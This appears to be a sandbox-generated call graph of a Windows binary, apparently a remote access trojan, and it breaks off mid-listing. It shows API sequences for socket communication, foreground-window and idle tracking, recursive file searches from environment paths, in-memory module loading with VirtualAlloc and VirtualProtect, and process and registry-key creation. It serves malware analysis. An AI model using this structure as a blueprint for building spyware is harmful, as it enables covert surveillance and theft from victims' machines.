calls 101692->101693 101694 4020a6 101693->101694 101736 4024ed 101694->101736 101697 41b4ef 101698 41b5a0 101697->101698 101699 41b505 GetLocalTime 101697->101699 101700 401fd8 11 API calls 101698->101700 101701 40531e 28 API calls 101699->101701 101702 41b5a8 101700->101702 101703 41b547 101701->101703 101704 401fd8 11 API calls 101702->101704 101747 406383 101703->101747 101706 41b5b0 101704->101706 101706->101583 101708 402f10 28 API calls 101709 41b55f 101708->101709 101710 406383 28 API calls 101709->101710 101711 41b56b 101710->101711 101752 407200 76 API calls 101711->101752 101713 41b579 101714 401fd8 11 API calls 101713->101714 101715 41b585 101714->101715 101716 401fd8 11 API calls 101715->101716 101717 41b58e 101716->101717 101718 401fd8 11 API calls 101717->101718 101719 41b597 101718->101719 101720 401fd8 11 API calls 101719->101720 101720->101698 101721->101589 101722->101632 101723->101611 101724->101628 101725->101623 101726->101595 101729 4020e7 101728->101729 101730 4023ce 11 API calls 101729->101730 101731 4020f2 101730->101731 101731->101688 101734 4032aa 101732->101734 101733 4032c9 101733->101690 101734->101733 101735 4028e8 28 API calls 101734->101735 101735->101733 101737 4024f9 101736->101737 101740 40250a 101737->101740 101739 4020b1 101739->101697 101741 40251a 101740->101741 101742 402520 101741->101742 101743 402535 101741->101743 101745 402569 28 API calls 101742->101745 101744 4028e8 28 API calls 101743->101744 101746 402533 101744->101746 101745->101746 101746->101739 101753 4051ef 101747->101753 101749 406391 101757 402055 101749->101757 101752->101713 101754 4051fb 101753->101754 101763 405274 101754->101763 101756 405208 101756->101749 101758 402061 101757->101758 101759 4023ce 11 API calls 101758->101759 101760 40207b 101759->101760 101785 40267a 101760->101785 101764 405282 101763->101764 101765 405288 101764->101765 101766 40529e 101764->101766 101774 4025f0 101765->101774 101767 4052f5 101766->101767 101768 4052b6 101766->101768 101783 4028a4 22 API calls 101767->101783 101772 4028e8 28 API calls 101768->101772 101773 40529c 101768->101773 101772->101773 101773->101756 101775 402888 22 API calls 101774->101775 101776 402602 101775->101776 101777 402672 101776->101777 101778 402629 101776->101778 101784 4028a4 22 API calls 101777->101784 101781 4028e8 28 API calls 101778->101781 101782 40263b 101778->101782 101781->101782 101782->101773 101786 40268b 101785->101786 101787 4023ce 11 API calls 101786->101787 101788 40208d 101787->101788 101788->101708 101790 4025f0 28 API calls 101789->101790 101791 401fbd 101790->101791 101791->101646 101793 405214 101792->101793 101794 4023ce 11 API calls 101793->101794 101795 40521f 101794->101795 101799 405234 101795->101799 101797 40522e 101797->101652 101798->101659 101800 405240 101799->101800 101801 40526e 101799->101801 101803 4028e8 28 API calls 101800->101803 101815 4028a4 22 API calls 101801->101815 101804 40524a 101803->101804 101804->101797 101821 446137 __Getctype 101816->101821 101817 446175 101871 4405dd 20 API calls _abort 101817->101871 101819 446160 RtlAllocateHeap 101820 446173 101819->101820 101819->101821 101820->101677 101821->101817 101821->101819 101870 442f80 7 API calls 2 library calls 101821->101870 101824 404ba0 WaitForSingleObject 101823->101824 101825 404bcd recv 101823->101825 101872 421076 53 API calls 101824->101872 101827 404be0 101825->101827 101827->101677 101828 404bbc SetEvent 101828->101827 101830 4020bf 101829->101830 101831 4023ce 11 API calls 101830->101831 101832 4020ca 101831->101832 101833 40250a 28 API calls 101832->101833 101834 4020d9 101833->101834 101834->101677 101836 401ff1 101835->101836 101837 402039 101835->101837 101838 4023ce 11 API calls 101836->101838 101837->101677 101839 401ffa 101838->101839 101840 40203c 101839->101840 101842 402015 101839->101842 101841 40267a 11 API calls 101840->101841 101841->101837 101873 403098 28 API calls 101842->101873 101845 4020df 11 API calls 101844->101845 101854 404cde 101845->101854 101846 404e13 101847 401fd8 11 API calls 101846->101847 101848 404e1c 101847->101848 101848->101677 101849 4041a2 28 API calls 101849->101854 101850 401fe2 28 API calls 101850->101854 101851 4020f6 28 API calls 101851->101854 101854->101846 101854->101849 101854->101850 101854->101851 101855 401fd8 11 API calls 101854->101855 101874 41299f 101854->101874 101918 401fc0 101854->101918 101855->101854 101858 404e40 SetEvent FindCloseChangeNotification 101857->101858 101859 404e57 closesocket 101857->101859 101860 404ca8 101858->101860 101861 404e64 101859->101861 101860->101680 101862 404e7a 101861->101862 102463 4050e4 83 API calls 101861->102463 101864 404e8c WaitForSingleObject 101862->101864 101865 404ece SetEvent CloseHandle 101862->101865 102464 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 101864->102464 101865->101860 101867 404e9b SetEvent WaitForSingleObject 102465 41e711 DeleteCriticalSection EnterCriticalSection LeaveCriticalSection 101867->102465 101869 404eb3 SetEvent CloseHandle CloseHandle 101869->101865 101870->101821 101871->101820 101872->101828 101873->101837 101875 4129b1 101874->101875 101922 4041a2 101875->101922 101878 4020f6 28 API calls 101879 4129d3 101878->101879 101880 4020f6 28 API calls 101879->101880 101881 4129e2 101880->101881 101925 41be1b 101881->101925 101884 412a93 102094 401e8d 101884->102094 101885 401e65 22 API calls 101887 412a02 101885->101887 101889 4020f6 28 API calls 101887->101889 101892 412a0d 101889->101892 101890 401fd8 11 API calls 101891 412aa5 101890->101891 101893 401fd8 11 API calls 101891->101893 101894 401e65 22 API calls 101892->101894 101895 412aad 101893->101895 101896 412a18 101894->101896 101895->101854 101897 4020f6 28 API calls 101896->101897 101898 412a23 101897->101898 101899 401e65 22 API calls 101898->101899 101900 412a2e 101899->101900 101901 4020f6 28 API calls 101900->101901 101902 412a39 101901->101902 101903 401e65 22 API calls 101902->101903 101904 412a44 101903->101904 101905 4020f6 28 API calls 101904->101905 101906 412a4f 101905->101906 101907 401e65 22 API calls 101906->101907 101908 412a5a 101907->101908 101909 4020f6 28 API calls 101908->101909 101910 412a65 101909->101910 101911 401e65 22 API calls 101910->101911 101912 412a73 101911->101912 101913 4020f6 28 API calls 101912->101913 101914 412a7e 101913->101914 101947 412ab4 GetModuleFileNameW 101914->101947 101917 404e26 98 API calls 101917->101884 101919 401fd2 CreateEventA CreateThread WaitForSingleObject FindCloseChangeNotification 101918->101919 101920 401fc9 101918->101920 101919->101854 102322 415aea 101919->102322 102321 4025e0 28 API calls 101920->102321 102100 40423a 101922->102100 101926 4020df 11 API calls 101925->101926 101927 41be2e 101926->101927 101931 41bea0 101927->101931 101934 4041a2 28 API calls 101927->101934 101939 401fe2 28 API calls 101927->101939 101942 401fd8 11 API calls 101927->101942 101946 41be9e 101927->101946 102106 41ce34 28 API calls 101927->102106 101928 401fd8 11 API calls 101929 41bed0 101928->101929 101930 401fd8 11 API calls 101929->101930 101932 41bed8 101930->101932 101933 4041a2 28 API calls 101931->101933 101935 401fd8 11 API calls 101932->101935 101936 41beac 101933->101936 101934->101927 101937 4129eb 101935->101937 101938 401fe2 28 API calls 101936->101938 101937->101884 101937->101885 101940 41beb5 101938->101940 101939->101927 101941 401fd8 11 API calls 101940->101941 101943 41bebd 101941->101943 101942->101927 102107 41ce34 28 API calls 101943->102107 101946->101928 101948 4020df 11 API calls 101947->101948 101949 412adf 101948->101949 101950 4020df 11 API calls 101949->101950 101951 412aeb 101950->101951 101952 4020df 11 API calls 101951->101952 101958 412af7 101952->101958 101953 41b978 42 API calls 101953->101958 101954 40d9e8 32 API calls 101954->101958 101955 401fd8 11 API calls 101955->101958 101956 403014 28 API calls 101956->101958 101957 418568 31 API calls 101957->101958 101958->101953 101958->101954 101958->101955 101958->101956 101958->101957 101959 412c1d Sleep 101958->101959 101960 40417e 28 API calls 101958->101960 101961 4042fc 78 API calls 101958->101961 101962 401f09 11 API calls 101958->101962 101963 412cbf Sleep 101958->101963 101964 40431d 28 API calls 101958->101964 101965 412d61 Sleep 101958->101965 101966 412dc4 DeleteFileW 101958->101966 101967 412dfb DeleteFileW 101958->101967 101968 41c485 32 API calls 101958->101968 101969 412e4d Sleep 101958->101969 101970 412e37 DeleteFileW 101958->101970 101971 412ec6 101958->101971 101978 412e92 Sleep 101958->101978 101959->101958 101960->101958 101961->101958 101962->101958 101963->101958 101964->101958 101965->101958 101966->101958 101967->101958 101968->101958 101969->101958 101970->101958 101972 401f09 11 API calls 101971->101972 101973 412ed2 101972->101973 101974 401f09 11 API calls 101973->101974 101975 412ede 101974->101975 101976 401f09 11 API calls 101975->101976 101977 412eea 101976->101977 102108 40b904 101977->102108 101980 401f09 11 API calls 101978->101980 101985 412ea2 101980->101985 101981 412efd 101983 4020f6 28 API calls 101981->101983 101982 401f09 11 API calls 101982->101985 101984 412f1d 101983->101984 102114 41322d 101984->102114 101985->101958 101985->101982 101987 412ec4 101985->101987 101987->101977 101990 412f34 101991 412f54 101990->101991 101992 4130a8 101990->101992 101994 41bd1e 28 API calls 101991->101994 102129 41bd1e 101992->102129 101995 412f60 101994->101995 102142 41bb8e 101995->102142 101997 402f31 28 API calls 102000 4130e8 101997->102000 102001 402f10 28 API calls 102000->102001 102004 4130f7 102001->102004 102002 402f31 28 API calls 102003 412faa 102002->102003 102005 402f10 28 API calls 102003->102005 102006 402f10 28 API calls 102004->102006 102007 412fb9 102005->102007 102008 413103 102006->102008 102010 402f10 28 API calls 102007->102010 102009 402f10 28 API calls 102008->102009 102012 413112 102009->102012 102011 412fc8 102010->102011 102014 402f10 28 API calls 102011->102014 102013 402f10 28 API calls 102012->102013 102016 413121 102013->102016 102015 412fd7 102014->102015 102018 402f10 28 API calls 102015->102018 102017 402f10 28 API calls 102016->102017 102020 413130 102017->102020 102019 412fe6 102018->102019 102022 402f10 28 API calls 102019->102022 102021 402f10 28 API calls 102020->102021 102024 41313f 102021->102024 102023 412ff2 102022->102023 102026 402f10 28 API calls 102023->102026 102133 402ea1 102024->102133 102027 412ffe 102026->102027 102030 402ea1 28 API calls 102027->102030 102029 404aa1 60 API calls 102032 413156 102029->102032 102031 41300d 102030->102031 102034 402f10 28 API calls 102031->102034 102033 401fd8 11 API calls 102032->102033 102036 413162 102033->102036 102035 413019 102034->102035 102037 402ea1 28 API calls 102035->102037 102038 401fd8 11 API calls 102036->102038 102039 413023 102037->102039 102040 41316e 102038->102040 102042 404aa1 60 API calls 102039->102042 102041 401fd8 11 API calls 102040->102041 102044 41317a 102041->102044 102043 413030 102042->102043 102046 401fd8 11 API calls 102043->102046 102045 401fd8 11 API calls 102044->102045 102048 413186 102045->102048 102047 413039 102046->102047 102050 401fd8 11 API calls 102047->102050 102049 401fd8 11 API calls 102048->102049 102052 41318f 102049->102052 102051 413042 102050->102051 102054 401fd8 11 API calls 102051->102054 102053 401fd8 11 API calls 102052->102053 102056 413198 102053->102056 102055 41304b 102054->102055 102058 401fd8 11 API calls 102055->102058 102057 401fd8 11 API calls 102056->102057 102060 41309c 102057->102060 102059 413054 102058->102059 102061 401fd8 11 API calls 102059->102061 102063 401fd8 11 API calls 102060->102063 102062 413060 102061->102062 102065 401fd8 11 API calls 102062->102065 102064 4131aa 102063->102064 102067 401f09 11 API calls 102064->102067 102066 41306c 102065->102066 102068 401fd8 11 API calls 102066->102068 102069 4131b6 102067->102069 102070 413078 102068->102070 102071 401fd8 11 API calls 102069->102071 102073 401fd8 11 API calls 102070->102073 102072 4131c2 102071->102072 102075 401fd8 11 API calls 102072->102075 102074 413084 102073->102074 102077 401fd8 11 API calls 102074->102077 102076 4131ce 102075->102076 102079 401fd8 11 API calls 102076->102079 102078 413090 102077->102078 102081 401fd8 11 API calls 102078->102081 102080 4131da 102079->102080 102082 401fd8 11 API calls 102080->102082 102081->102060 102083 4131e6 102082->102083 102084 401fd8 11 API calls 102083->102084 102085 4131f2 102084->102085 102086 401fd8 11 API calls 102085->102086 102087 4131fe 102086->102087 102088 401fd8 11 API calls 102087->102088 102089 41320a 102088->102089 102090 401fd8 11 API calls 102089->102090 102091 413216 102090->102091 102092 401fd8 11 API calls 102091->102092 102093 412a83 102092->102093 102093->101917 102096 402163 102094->102096 102095 40219f 102095->101890 102096->102095 102319 402730 11 API calls 102096->102319 102098 402184 102320 402712 11 API calls std::_Deallocate 102098->102320 102101 404243 102100->102101 102102 4023ce 11 API calls 102101->102102 102103 40424e 102102->102103 102104 402569 28 API calls 102103->102104 102105 4041b5 102104->102105 102105->101878 102106->101927 102107->101946 102109 40b90c 102108->102109 102147 402252 102109->102147 102111 40b917 102151 40b92c 102111->102151 102113 40b926 102113->101981 102115 41326b 102114->102115 102117 41323c 102114->102117 102116 41327a 102115->102116 102185 1e6c1c5b 102115->102185 102179 40417e 102116->102179 102189 411cf2 102117->102189 102121 401fd8 11 API calls 102124 412f28 102121->102124 102126 401f09 102124->102126 102127 402252 11 API calls 102126->102127 102128 401f12 102127->102128 102128->101990 102130 41bd2b 102129->102130 102131 4020b7 28 API calls 102130->102131 102132 4130b1 102131->102132 102132->101997 102137 402eb0 102133->102137 102134 402ef2 102135 401fb0 28 API calls 102134->102135 102136 402ef0 102135->102136 102138 402055 11 API calls 102136->102138 102137->102134 102140 402ee7 102137->102140 102139 402f09 102138->102139 102139->102029 102309 403365 28 API calls 102140->102309 102310 441e81 102142->102310 102145 402093 28 API calls 102146 412f7a 102145->102146 102146->102002 102148 4022ac 102147->102148 102149 40225c 102147->102149 102148->102111 102149->102148 102158 402779 11 API calls std::_Deallocate 102149->102158 102152 40b966 102151->102152 102153 40b938 102151->102153 102170 4028a4 22 API calls 102152->102170 102159 4027e6 102153->102159 102157 40b942 102157->102113 102158->102148 102160 4027ef 102159->102160 102161 402851 102160->102161 102162 4027f9 102160->102162 102177 4028a4 22 API calls 102161->102177 102165 402802 102162->102165 102168 402815 102162->102168 102171 402aea 102165->102171 102166 402813 102166->102157 102168->102166 102169 402252 11 API calls 102168->102169 102169->102166 102172 402af4 __EH_prolog 102171->102172 102178 402e45 22 API calls 102172->102178 102174 402252 11 API calls 102176 402bce 102174->102176 102175 402b60 102175->102174 102176->102166 102178->102175 102180 404186 102179->102180 102181 402252 11 API calls 102180->102181 102182 404191 102181->102182 102193 4041bc 102182->102193 102186 1e6c1c6b ___scrt_fastfail 102185->102186 102214 1e6c12ee 102186->102214 102188 1e6c1c87 102188->102116 102256 411cfe 102189->102256 102192 411f67 22 API calls _Yarn 102192->102115 102194 4041c8 102193->102194 102197 4041d9 102194->102197 102196 40419c 102196->102121 102198 4041e9 102197->102198 102199 404206 102198->102199 102200 4041ef 102198->102200 102201 4027e6 28 API calls 102199->102201 102204 404267 102200->102204 102203 404204 102201->102203 102203->102196 102205 402888 22 API calls 102204->102205 102206 40427b 102205->102206 102207 404290 102206->102207 102208 4042a5 102206->102208 102210 4042df 22 API calls 102207->102210 102209 4027e6 28 API calls 102208->102209 102213 4042a3 102209->102213 102211 404299 102210->102211 102212 402c48 22 API calls 102211->102212 102212->102213 102213->102203 102215 1e6c1324 ___scrt_fastfail 102214->102215 102216 1e6c13b7 GetEnvironmentVariableW 102215->102216 102240 1e6c10f1 102216->102240 102219 1e6c10f1 57 API calls 102220 1e6c1465 102219->102220 102221 1e6c10f1 57 API calls 102220->102221 102222 1e6c1479 102221->102222 102223 1e6c10f1 57 API calls 102222->102223 102224 1e6c148d 102223->102224 102225 1e6c10f1 57 API calls 102224->102225 102226 1e6c14a1 102225->102226 102227 1e6c10f1 57 API calls 102226->102227 102228 1e6c14b5 lstrlenW 102227->102228 102229 1e6c14d9 lstrlenW 102228->102229 102239 1e6c14d2 102228->102239 102230 1e6c10f1 57 API calls 102229->102230 102231 1e6c1501 lstrlenW lstrcatW 102230->102231 102232 1e6c10f1 57 API calls 102231->102232 102233 1e6c1539 lstrlenW lstrcatW 102232->102233 102234 1e6c10f1 57 API calls 102233->102234 102235 1e6c156b lstrlenW lstrcatW 102234->102235 102236 1e6c10f1 57 API calls 102235->102236 102237 1e6c159d lstrlenW lstrcatW 102236->102237 102238 1e6c10f1 57 API calls 102237->102238 102238->102239 102239->102188 102241 1e6c1118 ___scrt_fastfail 102240->102241 102242 1e6c1129 lstrlenW 102241->102242 102253 1e6c2c40 102242->102253 102245 1e6c1168 lstrlenW 102246 1e6c1177 lstrlenW FindFirstFileW 102245->102246 102247 1e6c11a0 102246->102247 102248 1e6c11e1 102246->102248 102249 1e6c11aa 102247->102249 102250 1e6c11c7 FindNextFileW 102247->102250 102248->102219 102249->102250 102255 1e6c1000 57 API calls ___scrt_fastfail 102249->102255 102250->102247 102252 1e6c11da FindClose 102250->102252 102252->102248 102254 1e6c1148 lstrcatW lstrlenW 102253->102254 102254->102245 102254->102246 102255->102249 102289 41179c 102256->102289 102258 411d1c 102259 411d32 SetLastError 102258->102259 102260 41179c SetLastError 102258->102260 102286 411cfa 102258->102286 102259->102286 102261 411d4f 102260->102261 102261->102259 102263 411d71 GetNativeSystemInfo 102261->102263 102261->102286 102264 411db7 102263->102264 102275 411dc4 SetLastError 102264->102275 102292 411ca3 VirtualAlloc 102264->102292 102267 411de7 102268 411e0c GetProcessHeap HeapAlloc 102267->102268 102302 411ca3 VirtualAlloc 102267->102302 102269 411e23 102268->102269 102270 411e35 102268->102270 102303 411cba VirtualFree 102269->102303 102273 41179c SetLastError 102270->102273 102276 411e7e 102273->102276 102274 411dff 102274->102268 102274->102275 102275->102286 102277 411f30 102276->102277 102293 411ca3 VirtualAlloc 102276->102293 102304 412077 GetProcessHeap HeapFree 102277->102304 102280 411e97 _Yarn 102294 4117af SetLastError _Yarn ___scrt_get_show_window_mode 102280->102294 102282 411ec3 102282->102277 102295 411b5f 26 API calls 102282->102295 102284 411ef0 102284->102277 102296 41194f 102284->102296 102286->102192 102287 411efb 102287->102277 102287->102286 102288 411f25 SetLastError 102287->102288 102288->102277 102290 4117a0 SetLastError 102289->102290 102291 4117ab 102289->102291 102290->102258 102291->102258 102292->102267 102293->102280 102294->102282 102295->102284 102300 411975 102296->102300 102297 411a5e 102298 4118b2 VirtualProtect 102297->102298 102299 411a70 102298->102299 102299->102287 102300->102297 102300->102299 102305 4118b2 102300->102305 102302->102274 102303->102275 102304->102286 102306 4118c3 102305->102306 102308 4118bb 102305->102308 102307 411936 VirtualProtect 102306->102307 102306->102308 102307->102308 102308->102300 102309->102136 102311 441e8d 102310->102311 102314 441c7d 102311->102314 102313 41bbb2 102313->102145 102315 441c94 102314->102315 102317 441ccb __cftof 102315->102317 102318 4405dd 20 API calls _abort 102315->102318 102317->102313 102318->102317 102319->102098 102320->102095 102321->101919 102323 4020f6 28 API calls 102322->102323 102324 415b0c SetEvent 102323->102324 102325 415b21 102324->102325 102326 4041a2 28 API calls 102325->102326 102327 415b3b 102326->102327 102328 4020f6 28 API calls 102327->102328 102329 415b4b 102328->102329 102330 4020f6 28 API calls 102329->102330 102331 415b5d 102330->102331 102332 41be1b 28 API calls 102331->102332 102333 415b66 102332->102333 102334 415b86 GetTickCount 102333->102334 102398 415cd6 102333->102398 102399 415cf9 102333->102399 102336 41bb8e 28 API calls 102334->102336 102335 401e8d 11 API calls 102337 417092 102335->102337 102338 415b97 102336->102338 102340 401fd8 11 API calls 102337->102340 102401 41bae6 GetLastInputInfo GetTickCount 102338->102401 102341 41709e 102340->102341 102343 401fd8 11 API calls 102341->102343 102345 4170aa 102343->102345 102344 415ba3 102346 41bb8e 28 API calls 102344->102346 102347 415bae 102346->102347 102402 41ba96 102347->102402 102350 41bd1e 28 API calls 102351 415bca 102350->102351 102352 401e65 22 API calls 102351->102352 102353 415bd8 102352->102353 102354 402f31 28 API calls 102353->102354 102355 415be6 102354->102355 102356 402ea1 28 API calls 102355->102356 102357 415bf5 102356->102357 102358 402f10 28 API calls 102357->102358 102359 415c04 102358->102359 102360 402ea1 28 API calls 102359->102360 102361 415c13 102360->102361 102362 402f10 28 API calls 102361->102362 102363 415c1f 102362->102363 102364 402ea1 28 API calls 102363->102364 102365 415c29 102364->102365 102366 404aa1 60 API calls 102365->102366 102367 415c38 102366->102367 102368 401fd8 11 API calls 102367->102368 102369 415c41 102368->102369 102370 401fd8 11 API calls 102369->102370 102371 415c4d 102370->102371 102372 401fd8 11 API calls 102371->102372 102373 415c59 102372->102373 102374 401fd8 11 API calls 102373->102374 102375 415c65 102374->102375 102376 401fd8 11 API calls 102375->102376 102377 415c71 102376->102377 102378 401fd8 11 API calls 102377->102378 102379 415c7d 102378->102379 102380 401f09 11 API calls 102379->102380 102381 415c86 102380->102381 102382 401fd8 11 API calls 102381->102382 102383 415c8f 102382->102383 102384 401fd8 11 API calls 102383->102384 102385 415c98 102384->102385 102386 401e65 22 API calls 102385->102386 102387 415ca3 102386->102387 102407 43baac 102387->102407 102390 415cb5 102394 415cc3 102390->102394 102395 415cce 102390->102395 102391 415cdb 102392 401e65 22 API calls 102391->102392 102393 415ce5 102392->102393 102393->102398 102393->102399 102411 404ff4 81 API calls 102394->102411 102412 404f51 102395->102412 102398->102335 102427 4050e4 83 API calls 102399->102427 102400 415cc9 102400->102398 102401->102344 102428 436e90 102402->102428 102405 40417e 28 API calls 102406 415bbc 102405->102406 102406->102350 102408 43bac5 _strftime 102407->102408 102430 43ae03 102408->102430 102410 415cb0 102410->102390 102410->102391 102411->102400 102413 404f65 102412->102413 102414 404fea 102412->102414 102415 404f6e 102413->102415 102416 404fc0 CreateEventA CreateThread 102413->102416 102417 404f7d GetLocalTime 102413->102417 102414->102398 102415->102416 102416->102414 102459 405150 102416->102459 102418 41bb8e 28 API calls 102417->102418 102419 404f91 102418->102419 102458 4052fd 28 API calls 102419->102458 102427->102400 102429 41bab5 GetForegroundWindow GetWindowTextW 102428->102429 102429->102405 102446 43ba0a 102430->102446 102432 43ae50 102452 43a7b7 35 API calls 3 library calls 102432->102452 102434 43ae15 102434->102432 102435 43ae2a 102434->102435 102445 43ae2f __cftof 102434->102445 102451 4405dd 20 API calls _abort 102435->102451 102438 43ae5c 102439 43ae8b 102438->102439 102453 43ba4f 39 API calls __Toupper 102438->102453 102442 43aef7 102439->102442 102454 43b9b6 20 API calls 2 library calls 102439->102454 102455 43b9b6 20 API calls 2 library calls 102442->102455 102443 43afbe _strftime 102443->102445 102456 4405dd 20 API calls _abort 102443->102456 102445->102410 102447 43ba22 102446->102447 102448 43ba0f 102446->102448 102447->102434 102457 4405dd 20 API calls _abort 102448->102457 102450 43ba14 __cftof 102450->102434 102451->102445 102452->102438 102453->102438 102454->102442 102455->102443 102456->102445 102457->102450 102462 40515c 101 API calls 102459->102462 102461 405159 102462->102461 102463->101862 102464->101867 102465->101869 102466 434887 102467 434893 ___scrt_is_nonwritable_in_current_image 102466->102467 102493 434596 102467->102493 102469 43489a 102471 4348c3 102469->102471 102791 4349f9 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_get_show_window_mode 102469->102791 102478 434902 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 102471->102478 102792 444251 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 102471->102792 102473 4348dc 102475 4348e2 ___scrt_is_nonwritable_in_current_image 102473->102475 102793 4441f5 5 API calls __ehhandler$??_EGlobalCore@details@Concurrency@@QAEPAXI@Z 102473->102793 102482 434962 102478->102482 102794 4433e7 35 API calls 2 library calls 102478->102794 102504 434b14 102482->102504 102486 434984 102487 43498e 102486->102487 102796 44341f 28 API calls _abort 102486->102796 102489 434997 102487->102489 102797 4433c2 28 API calls _abort 102487->102797 102798 43470d 13 API calls 2 library calls 102489->102798 102492 43499f 102492->102475 102494 43459f 102493->102494 102799 434c52 IsProcessorFeaturePresent 102494->102799 102496 4345ab 102800 438f31 10 API calls 4 library calls 102496->102800 102498 4345b0 102503 4345b4 102498->102503 102801 4440bf IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 102498->102801 102500 4345bd 102501 4345cb 102500->102501 102802 438f5a 8 API calls 3 library calls 102500->102802 102501->102469 102503->102469 102505 436e90 ___scrt_get_show_window_mode 102504->102505 102506 434b27 GetStartupInfoW 102505->102506 102507 434968 102506->102507 102508 4441a2 102507->102508 102803 44f059 102508->102803 102510 434971 102513 40e9c5 102510->102513 102511 4441ab 102511->102510 102807 446815 35 API calls 102511->102807 102809 41cb50 LoadLibraryA GetProcAddress 102513->102809 102515 40e9e1 GetModuleFileNameW 102814 40f3c3 102515->102814 102517 40e9fd 102518 4020f6 28 API calls 102517->102518 102519 40ea0c 102518->102519 102520 4020f6 28 API calls 102519->102520 102521 40ea1b 102520->102521 102522 41be1b 28 API calls 102521->102522 102523 40ea24 102522->102523 102829 40fb17 102523->102829 102525 40ea2d 102526 401e8d 11 API calls 102525->102526 102527 40ea36 102526->102527 102528 40ea93 102527->102528 102529 40ea49 102527->102529 102530 401e65 22 API calls 102528->102530 103023 40fbb3 116 API calls 102529->103023 102532 40eaa3 102530->102532 102536 401e65 22 API calls 102532->102536 102533 40ea5b 102534 401e65 22 API calls 102533->102534 102535 40ea67 102534->102535 103024 410f37 36 API calls __EH_prolog 102535->103024 102537 40eac2 102536->102537 102538 40531e 28 API calls 102537->102538 102540 40ead1 102538->102540 102542 406383 28 API calls 102540->102542 102541 40ea79 103025 40fb64 77 API calls 102541->103025 102544 40eadd 102542->102544 102546 401fe2 28 API calls 102544->102546 102545 40ea82 103026 40f3b0 70 API calls 102545->103026 102548 40eae9 102546->102548 102549 401fd8 11 API calls 102548->102549 102550 40eaf2 102549->102550 102552 401fd8 11 API calls 102550->102552 102551 401fd8 11 API calls 102553 40eefb 102551->102553 102554 40eafb 102552->102554 102795 4432f6 GetModuleHandleW 102553->102795 102555 401e65 22 API calls 102554->102555 102556 40eb04 102555->102556 102557 401fc0 28 API calls 102556->102557 102558 40eb0f 102557->102558 102559 401e65 22 API calls 102558->102559 102560 40eb28 102559->102560 102561 401e65 22 API calls 102560->102561 102562 40eb43 102561->102562 102563 40ebae 102562->102563 103027 406c1e 102562->103027 102564 401e65 22 API calls 102563->102564 102570 40ebbb 102564->102570 102566 40eb70 102567 401fe2 28 API calls 102566->102567 102568 40eb7c 102567->102568 102571 401fd8 11 API calls 102568->102571 102569 40ec02 102833 40d069 102569->102833 102570->102569 102576 413549 3 API calls 102570->102576 102573 40eb85 102571->102573 103032 413549 RegOpenKeyExA 102573->103032 102574 40ec08 102575 40ea8b 102574->102575 102836 41b2c3 102574->102836 102575->102551 102582 40ebe6 102576->102582 102580 40f34f 103125 4139a9 30 API calls 102580->103125 102581 40ec23 102584 40ec76 102581->102584 102853 407716 102581->102853 102582->102569 103035 4139a9 30 API calls 102582->103035 102585 401e65 22 API calls 102584->102585 102588 40ec7f 102585->102588 102597 40ec90 102588->102597 102598 40ec8b 102588->102598 102590 40f365 103126 412475 65 API calls ___scrt_get_show_window_mode 102590->103126 102591 40ec42 103036 407738 30 API calls 102591->103036 102592 40ec4c 102595 401e65 22 API calls 102592->102595 102607 40ec55 102595->102607 102596 40f36f 102600 41bc5e 28 API calls 102596->102600 102603 401e65 22 API calls 102597->102603 103039 407755 CreateProcessA CloseHandle CloseHandle ___scrt_get_show_window_mode 102598->103039 102599 40ec47 103037 407260 97 API calls 102599->103037 102604 40f37f 102600->102604 102605 40ec99 102603->102605 102925 413a23 RegOpenKeyExW 102604->102925 102857 41bc5e 102605->102857 102607->102584 102612 40ec71 102607->102612 102608 40eca4 102861 401f13 102608->102861 103038 407260 97 API calls 102612->103038 102614 401f09 11 API calls 102616 40f39c 102614->102616 102619 401f09 11 API calls 102616->102619 102617 401f09 11 API calls 102618 40ecb8 102617->102618 102620 401e65 22 API calls 102618->102620 102621 40f3a5 102619->102621 102622 40ecc1 102620->102622 102928 40dd42 102621->102928 102626 401e65 22 API calls 102622->102626 102628 40ecdb 102626->102628 102627 40f3af 102629 401e65 22 API calls 102628->102629 102630 40ecf5 102629->102630 102631 401e65 22 API calls 102630->102631 102633 40ed0e 102631->102633 102632 40ed7b 102635 40ed8a 102632->102635 102641 40ef06 ___scrt_get_show_window_mode 102632->102641 102633->102632 102634 401e65 22 API calls 102633->102634 102639 40ed23 _wcslen 102634->102639 102636 40ed93 102635->102636 102664 40ee0f ___scrt_get_show_window_mode 102635->102664 102637 401e65 22 API calls 102636->102637 102638 40ed9c 102637->102638 102640 401e65 22 API calls 102638->102640 102639->102632 102642 401e65 22 API calls 102639->102642 102643 40edae 102640->102643 103100 4136f8 RegOpenKeyExA 102641->103100 102644 40ed3e 102642->102644 102646 401e65 22 API calls 102643->102646 102648 401e65 22 API calls 102644->102648 102647 40edc0 102646->102647 102651 401e65 22 API calls 102647->102651 102649 40ed53 102648->102649 103040 40da34 102649->103040 102650 40ef51 102652 401e65 22 API calls 102650->102652 102654 40ede9 102651->102654 102655 40ef76 102652->102655 102659 401e65 22 API calls 102654->102659 102660 402093 28 API calls 102655->102660 102657 401f13 28 API calls 102658 40ed72 102657->102658 102661 401f09 11 API calls 102658->102661 102662 40edfa 102659->102662 102663 40ef88 102660->102663 102661->102632 103098 40cdf9 46 API calls _wcslen 102662->103098 102880 41376f RegCreateKeyA 102663->102880 102870 413947 102664->102870 102669 40eea3 ctype 102673 401e65 22 API calls 102669->102673 102670 40ee0a 102670->102664 102671 401e65 22 API calls 102672 40efaa 102671->102672 102675 43baac _strftime 39 API calls 102672->102675 102674 40eeba 102673->102674 102674->102650 102677 40eece 102674->102677 102676 40efb7 102675->102676 102678 40efc1 102676->102678 102680 40efe4 102676->102680 102679 401e65 22 API calls 102677->102679 103103 41cd9b 87 API calls ___scrt_get_show_window_mode 102678->103103 102681 40eed7 102679->102681 102683 402093 28 API calls 102680->102683 102684 41bc5e 28 API calls 102681->102684 102686 40eff9 102683->102686 102687 40eee3 102684->102687 102685 40efc8 CreateThread 102685->102680 103570 41d45d 10 API calls 102685->103570 102688 402093 28 API calls 102686->102688 103099 40f474 113 API calls 102687->103099 102690 40f008 102688->102690 102692 41b4ef 79 API calls 102690->102692 102691 40eee8 102691->102650 102693 40eeef 102691->102693 102694 40f00d 102692->102694 102693->102575 102695 401e65 22 API calls 102694->102695 102696 40f019 